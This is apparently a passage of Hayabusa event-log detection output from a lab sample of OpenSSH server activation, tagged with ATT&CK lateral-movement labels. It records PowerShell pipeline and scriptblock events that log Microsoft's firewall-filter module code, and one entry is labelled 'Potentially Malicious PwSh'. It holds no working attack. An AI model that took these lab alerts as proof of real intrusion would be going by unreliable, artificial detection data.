[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.340 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 